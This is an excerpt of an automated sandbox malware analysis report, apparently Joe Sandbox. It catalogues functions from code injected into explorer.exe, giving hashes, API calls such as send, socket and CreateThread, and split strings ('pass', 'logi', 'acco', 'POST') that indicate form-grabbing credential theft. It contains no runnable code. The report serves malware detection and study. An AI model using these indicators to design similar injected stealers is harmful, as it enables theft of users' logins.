                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                    • Opcode ID: 26cfa5fcdda69d0d4d533717fb0ce74196146c22c1024e2978dcbefaf4c75163
                                                                                                                    • Instruction ID: 6959d5aea5a1f3ad1c62ce29d384a8fd8eafc46bb14379ebc39596f5c4cdfb89
                                                                                                                    • Opcode Fuzzy Hash: 26cfa5fcdda69d0d4d533717fb0ce74196146c22c1024e2978dcbefaf4c75163
                                                                                                                    • Instruction Fuzzy Hash: 47012170518A088FCB84EF5CD488B1577E0EB5C325F1652AE990DC7266C774CC81CBC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE79FE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 319 de79fe2-de7a012 320 de7a014-de7a036 call de7ce82 319->320 321 de7a039-de7a05e send 319->321 320->321
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID: send
                                                                                                                    • API String ID: 2809346765-2809346765
                                                                                                                    • Opcode ID: c1156832160c7cbf2357dffc88b3f2aa09fcf61c40fe602e018ee8590dea50e1
                                                                                                                    • Instruction ID: 28a4a03b5e0b24decd2f8b3ff391eb3d51d3a1b5115b26337cf65dbd52402b93
                                                                                                                    • Opcode Fuzzy Hash: c1156832160c7cbf2357dffc88b3f2aa09fcf61c40fe602e018ee8590dea50e1
                                                                                                                    • Instruction Fuzzy Hash: 79011E3061CA4C8FCB84EF5CD488B25B7E0EB58315F1585AEA94DCB266C674DC81CBC1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE79EE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 324 de79ee2-de79f17 325 de79f3e-de79f5c socket 324->325 326 de79f19-de79f3b call de7ce82 324->326 326->325
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket
                                                                                                                    • String ID: sock
                                                                                                                    • API String ID: 98920635-2415254727
                                                                                                                    • Opcode ID: ea1cc32e00cf9a00da4e56d5afec8b0f85b9dfc21dad66d163e7b53c40c8941b
                                                                                                                    • Instruction ID: 9fea3576ccd931a7bb54b37c5ab78517c067c03da27c7d337a74b5a58a4bd255
                                                                                                                    • Opcode Fuzzy Hash: ea1cc32e00cf9a00da4e56d5afec8b0f85b9dfc21dad66d163e7b53c40c8941b
                                                                                                                    • Instruction Fuzzy Hash: 91012C70518A488FCB84EF5CD448B25BBE0FB5C315F1652AEE94DCB266C7B4C9818B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7C482 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 329 de7c482-de7c4b6 330 de7c4b9-de7c4bd 329->330 331 de7c4bf-de7c4c2 330->331 332 de7c539-de7c542 330->332 331->332 334 de7c4c4-de7c52f call de7e2e2 call de7e2b2 call de7d4c2 331->334 332->330 333 de7c548-de7c551 332->333 336 de7c553-de7c55a 333->336 337 de7c58a-de7c5a6 333->337 334->332 348 de7c531-de7c537 SleepEx 334->348 339 de7c56f-de7c578 336->339 340 de7c55c-de7c55d 336->340 339->337 343 de7c57a-de7c581 339->343 342 de7c563-de7c56d 340->342 342->339 342->342 343->337 345 de7c583-de7c584 343->345 345->337 348->332
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: eeade5e2d921f8842601ad940775694ae8f6a05811242278dcee8ff13d9f4187
                                                                                                                    • Instruction ID: 82806022292d2c842f169a9b48d90564c6bce107f5d04e0098a171b4969b43a4
                                                                                                                    • Opcode Fuzzy Hash: eeade5e2d921f8842601ad940775694ae8f6a05811242278dcee8ff13d9f4187
                                                                                                                    • Instruction Fuzzy Hash: 1731F27151CB4C8FDB69CF18E88A9B973E4FB85710F10166ED88A87115DE31EA428AC2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE79D22 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 349 de79d22-de79d59 350 de79d6b-de79d72 349->350 351 de79d5b-de79d62 349->351 353 de79d78-de79e54 call de7e2b2 * 2 call de7e4d2 call de7e2b2 call de7e4d2 call de7e2b2 * 2 350->353 354 de79e5d-de79e77 350->354 352 de79d64 351->352 351->353 352->350 353->354 369 de79e56-de79e5b SleepEx 353->369 369->354
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 870cd9460108ac718fb18a2571e75b7787ec4f9d059ff645d4e775b831eb21c0
                                                                                                                    • Instruction ID: 0459e9cf8867c57f5e4f699abe2a6a521633156f09cc75278938742b6ec864af
                                                                                                                    • Opcode Fuzzy Hash: 870cd9460108ac718fb18a2571e75b7787ec4f9d059ff645d4e775b831eb21c0
                                                                                                                    • Instruction Fuzzy Hash: A2417C31208F0A8FC759EBA8D485AA2B3E4FB58300F00466EE5AFC7155DF70E6958BC1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE75592 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 370 de75592-de755d6 call de75012 call de7ce82 375 de755dc-de755de 370->375 376 de75678-de7568c 370->376 377 de755e2-de755f3 SleepEx 375->377 377->377 378 de755f5-de75607 377->378 379 de7563d-de75643 378->379 380 de75609-de7560f 378->380 379->377 382 de75645-de7564b 379->382 380->379 381 de75611-de75626 call de75ff2 380->381 381->379 387 de75628-de75638 call de75a42 381->387 382->377 384 de7564d-de75653 382->384 384->377 386 de75655-de75666 call de76e02 call de7c482 384->386 392 de7566b-de75673 call de753f2 386->392 387->379 392->377
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: d9e69307b1fdce6fb8af7ff33fc25878e8542ecb449219e9e4cd6c5c7f2a58bf
                                                                                                                    • Instruction ID: beda8b1529d7ac2326e15f30f841a010f785bac4f4c41da5c44bb69b332b60f0
                                                                                                                    • Opcode Fuzzy Hash: d9e69307b1fdce6fb8af7ff33fc25878e8542ecb449219e9e4cd6c5c7f2a58bf
                                                                                                                    • Instruction Fuzzy Hash: 72215E34618A0D8FCBD4EF6890D46BAB3E2FB94304F98167ED91ACB145DF71D5408B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE75692 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: 97ceca3d0e8f6ee8240e25bb843fcaec674b0906fe5287de3fd0110fbcd2fb4f
                                                                                                                    • Instruction ID: 417bc22da3d7565029acbbf238a590a782d3f63d57467776bd8370f4cc6d4588
                                                                                                                    • Opcode Fuzzy Hash: 97ceca3d0e8f6ee8240e25bb843fcaec674b0906fe5287de3fd0110fbcd2fb4f
                                                                                                                    • Instruction Fuzzy Hash: 99F0A430628A094FDB88EF6CD48566AB3D0FB98204F45467EA54DC7258DF35C5814752
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0AF73FA2 Relevance: 24.7, Strings: 19, Instructions: 981COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 464 af73fa2-af73fe5 465 af73fe7-af73fe8 464->465 466 af73fee-af740b6 call af792b2 464->466 465->466 469 af74125-af741d1 call af73e52 call af76372 call af792b2 466->469 470 af740b8-af74120 call af76372 466->470 478 af741d2-af741d8 469->478 470->469 479 af741df-af741e2 478->479 480 af741da-af741dd 478->480 482 af741e4-af741e8 479->482 483 af741ee-af741f6 479->483 480->479 481 af741f8-af741f9 480->481 484 af741fb-af742b7 call af761e2 call af796b2 call af794d2 call af761e2 call af794d2 call af796b2 481->484 482->483 485 af74ba9-af74bae 482->485 483->478 483->481 498 af742c2-af74497 call af792e2 * 2 call af75d02 call af794d2 call af792b2 * 2 call af794d2 call af70142 call af75972 call af76372 call af794d2 call af792b2 call af794d2 call af79762 call af75212 call af794d2 call af76142 call af76102 call af792b2 call af79302 484->498 485->484 539 af744a2-af744af 498->539 539->539 540 af744b1-af7455b call af792b2 call af76372 call af794d2 call af792b2 call af794d2 call af79302 539->540 553 af74562-af74579 540->553 553->553 554 af7457b-af74620 call af792b2 call af76372 call af794d2 call af792b2 call af79762 call af79302 553->554 567 af74625-af7465a 554->567 567->567 568 af7465c-af74706 call af792b2 call af76372 call af794d2 call af792b2 call af794d2 call af79302 567->568 581 af74712-af74751 568->581 581->581 582 af74753-af74818 call af792b2 call af76372 call af794d2 call af792b2 call af79762 call af794d2 call af79302 581->582 597 af74822-af74857 582->597 597->597 598 af74859-af74901 call af792b2 call af76372 call af794d2 call af792b2 call af79762 * 2 597->598 598->498 611 af74907-af74ba8 call af792b2 * 7 call af761e2 call af796b2 call af794d2 call af792b2 * 7 call af74f62 598->611
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $8$96$: $GET$ONS$OPTI$POST$PUT$acco$emainlogi$in$iste$logi$n$pass$pers$sign$unt
                                                                                                                    • API String ID: 0-4163873888
                                                                                                                    • Opcode ID: fd3bd69efe9b7cef98c6927b0794e20519b86be1119197ca745257d7d2668db2
                                                                                                                    • Instruction ID: dabd0a3bd5b6645440332645b8e5c6cc887d1a01266990fdd36d939146dc5db1
                                                                                                                    • Opcode Fuzzy Hash: fd3bd69efe9b7cef98c6927b0794e20519b86be1119197ca745257d7d2668db2
                                                                                                                    • Instruction Fuzzy Hash: E972A330118B9C8FCB69EF68C8887ED77E1FB55300F84056ED49ACB246EE749645CB46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE78FA2 Relevance: 24.7, Strings: 19, Instructions: 981COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $8$96$: $GET$ONS$OPTI$POST$PUT$acco$emainlogi$in$iste$logi$n$pass$pers$sign$unt
                                                                                                                    • API String ID: 0-4163873888
                                                                                                                    • Opcode ID: fd3bd69efe9b7cef98c6927b0794e20519b86be1119197ca745257d7d2668db2
                                                                                                                    • Instruction ID: ae1b36b1a0328ae6f52e78bbd34fdba94858a976a94583f1a135143092e6c550
                                                                                                                    • Opcode Fuzzy Hash: fd3bd69efe9b7cef98c6927b0794e20519b86be1119197ca745257d7d2668db2
                                                                                                                    • Instruction Fuzzy Hash: A572903121CB8C8FCB6AEF68C4887E977E1FB55300F44056EE59ACB146EE349645CB46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF71272 Relevance: 10.4, Strings: 8, Instructions: 406COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$32.d$M$S$el32$kern$ll$user
                                                                                                                    • API String ID: 0-2502794028
                                                                                                                    • Opcode ID: d8ec27aaafb41a51ea3e1b7c431325d14b82b88f1d1446da20088ebe6127282d
                                                                                                                    • Instruction ID: 0ed15258f8084382a1b33272042cf04254110968b99499ba490865b83e4d7cc8
                                                                                                                    • Opcode Fuzzy Hash: d8ec27aaafb41a51ea3e1b7c431325d14b82b88f1d1446da20088ebe6127282d
                                                                                                                    • Instruction Fuzzy Hash: BEE14A70618B498FCB99EF38C884BAAF3E1FF98300F80562E905EC7251DF34A5558B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE76272 Relevance: 10.4, Strings: 8, Instructions: 406COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$32.d$M$S$el32$kern$ll$user
                                                                                                                    • API String ID: 0-2502794028
                                                                                                                    • Opcode ID: d8ec27aaafb41a51ea3e1b7c431325d14b82b88f1d1446da20088ebe6127282d
                                                                                                                    • Instruction ID: e4a649dffead92fc87977d73adbeb6950915a948da3715743c8080418acbddde
                                                                                                                    • Opcode Fuzzy Hash: d8ec27aaafb41a51ea3e1b7c431325d14b82b88f1d1446da20088ebe6127282d
                                                                                                                    • Instruction Fuzzy Hash: 09E15A70618A499FCB99EF38C484BAAF3E1FF98304F51662E915EC7240DF34E5518B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF777E2 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 0-2679148245
                                                                                                                    • Opcode ID: dc3611c6621337a4705fb43b90c18ab6f806b77f01b00a2577724ad26c2a59d4
                                                                                                                    • Instruction ID: 84fb5d8860291ad10911be79aef03310de4be9c522ba791e1893566478b89f99
                                                                                                                    • Opcode Fuzzy Hash: dc3611c6621337a4705fb43b90c18ab6f806b77f01b00a2577724ad26c2a59d4
                                                                                                                    • Instruction Fuzzy Hash: 9F12F070A28B099FDB59EF28C8856AEF7E1FB58301F51462EE45ED3250DB30E551CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF76F29 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 0-4108050209
                                                                                                                    • Opcode ID: 97e4e9b56fb3b3d5978e9a1ffa029d9d0291d35a3106416d54f2467138d2b889
                                                                                                                    • Instruction ID: fb9730cbd3d9bf07538956ab3512a4eefc2185371ead8bf690f696e11076b74d
                                                                                                                    • Opcode Fuzzy Hash: 97e4e9b56fb3b3d5978e9a1ffa029d9d0291d35a3106416d54f2467138d2b889
                                                                                                                    • Instruction Fuzzy Hash: 16F10F70528A4C8FDBA9EF68CC94AEEB7E1FB98304F80462AD44AD7251DF349645CB41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7BF29 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 0-4108050209
                                                                                                                    • Opcode ID: 97e4e9b56fb3b3d5978e9a1ffa029d9d0291d35a3106416d54f2467138d2b889
                                                                                                                    • Instruction ID: 247a5c0f89d68fb98ea961e98b2cb175433e176fe5a0ca5fd5bef1faf99b2e2a
                                                                                                                    • Opcode Fuzzy Hash: 97e4e9b56fb3b3d5978e9a1ffa029d9d0291d35a3106416d54f2467138d2b889
                                                                                                                    • Instruction Fuzzy Hash: FAF15C70618A8C8FDBA9EF68C884AEEB7E4FF98304F41562AD54AD7250DF34D641CB41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF72C56 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: F:
                                                                                                                    • API String ID: 0-226985462
                                                                                                                    • Opcode ID: cdaca1ec2dd8c28c1c439c4feaabbc1fd081177805990cdef1724075a8c84129
                                                                                                                    • Instruction ID: 3203f86c5bfdfdc930f7ebfd81e7db61ae2cdbeb489174dde0e0d1b9753fcde6
                                                                                                                    • Opcode Fuzzy Hash: cdaca1ec2dd8c28c1c439c4feaabbc1fd081177805990cdef1724075a8c84129
                                                                                                                    • Instruction Fuzzy Hash: D7515C70A247488F8B98EF38849867EF3D6FF982057C04A6F848BCB656DF34C9419B41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE77C56 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: F:
                                                                                                                    • API String ID: 0-226985462
                                                                                                                    • Opcode ID: cdaca1ec2dd8c28c1c439c4feaabbc1fd081177805990cdef1724075a8c84129
                                                                                                                    • Instruction ID: 94f35fd6bd491df320ff99e06317c49fba3b642d92e8e612df91916d43b3de26
                                                                                                                    • Opcode Fuzzy Hash: cdaca1ec2dd8c28c1c439c4feaabbc1fd081177805990cdef1724075a8c84129
                                                                                                                    • Instruction Fuzzy Hash: ED5184707286488FCBD8EF38809863EB3D5FF98205B916A6F458BCB658DF34C9419B41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF72C62 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: F:
                                                                                                                    • API String ID: 0-226985462
                                                                                                                    • Opcode ID: 578b5e4228738ce0f00a2d4efbf85e85cc4f22736247bfbe62487a8a34360d40
                                                                                                                    • Instruction ID: 5bd327ed2272578196b60d4ce6931c3446ce82caae2cb2a0471cac91404cc5a9
                                                                                                                    • Opcode Fuzzy Hash: 578b5e4228738ce0f00a2d4efbf85e85cc4f22736247bfbe62487a8a34360d40
                                                                                                                    • Instruction Fuzzy Hash: 85514A70A2474C8F8B98EF38849863EF3D6FF992047C14A6F848BCB256DF3489019B41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE77C62 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: F:
                                                                                                                    • API String ID: 0-226985462
                                                                                                                    • Opcode ID: 578b5e4228738ce0f00a2d4efbf85e85cc4f22736247bfbe62487a8a34360d40
                                                                                                                    • Instruction ID: b01215f1960b76cee977a834b6e2b72d965cec80e93f8113866f2e4862cc23d3
                                                                                                                    • Opcode Fuzzy Hash: 578b5e4228738ce0f00a2d4efbf85e85cc4f22736247bfbe62487a8a34360d40
                                                                                                                    • Instruction Fuzzy Hash: 0D5163707286488FCB98EF38809863EB3D5FF89204B916A6F458BCB258DF34C9419B41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75242 Relevance: .5, Instructions: 513COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                                    • Instruction ID: 785272f6bb7046a3aeda58a84acff56131cf7a68b2c7112a6979eb13cb05f760
                                                                                                                    • Opcode Fuzzy Hash: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                                    • Instruction Fuzzy Hash: E5E10472BA86404BC70CDE18DCC26B973DAE7CA30AF59943DE4C7C7247DA29D5038949
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7A242 Relevance: .5, Instructions: 513COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                                    • Instruction ID: 2218ac4fd3eaefce615cd84f646598371001516c6068eb03cbcf3baed59c31f8
                                                                                                                    • Opcode Fuzzy Hash: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                                    • Instruction Fuzzy Hash: 5EE1F472BA86404BC70CDE18DCC26B973DAE7CA30AF59943DE4CBC7247DA29D5038949
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF70C52 Relevance: .3, Instructions: 319COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4e800f40d53fe47674cda4ed56f8053a9f9499602751ca137d16813e8d322eb
                                                                                                                    • Instruction ID: 1f5f054fc809ba2f6965776adf00312e705e6dcecf73ccd009890c162a230c6d
                                                                                                                    • Opcode Fuzzy Hash: f4e800f40d53fe47674cda4ed56f8053a9f9499602751ca137d16813e8d322eb
                                                                                                                    • Instruction Fuzzy Hash: EBB12F31628B498FC7A9EF14C894AEA73E5FF94305F84462ED44BCB151DF70A546CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE75C52 Relevance: .3, Instructions: 319COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4e800f40d53fe47674cda4ed56f8053a9f9499602751ca137d16813e8d322eb
                                                                                                                    • Instruction ID: faedb1aa60bb0870ab4600dd49126b5cb70e1ff355b7dd8771a881079d34e6f3
                                                                                                                    • Opcode Fuzzy Hash: f4e800f40d53fe47674cda4ed56f8053a9f9499602751ca137d16813e8d322eb
                                                                                                                    • Instruction Fuzzy Hash: 01B16631228B498FC799EF24C894AEA73E4FF94705F54166DA58BCB150EF30E546CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF761E2 Relevance: .1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
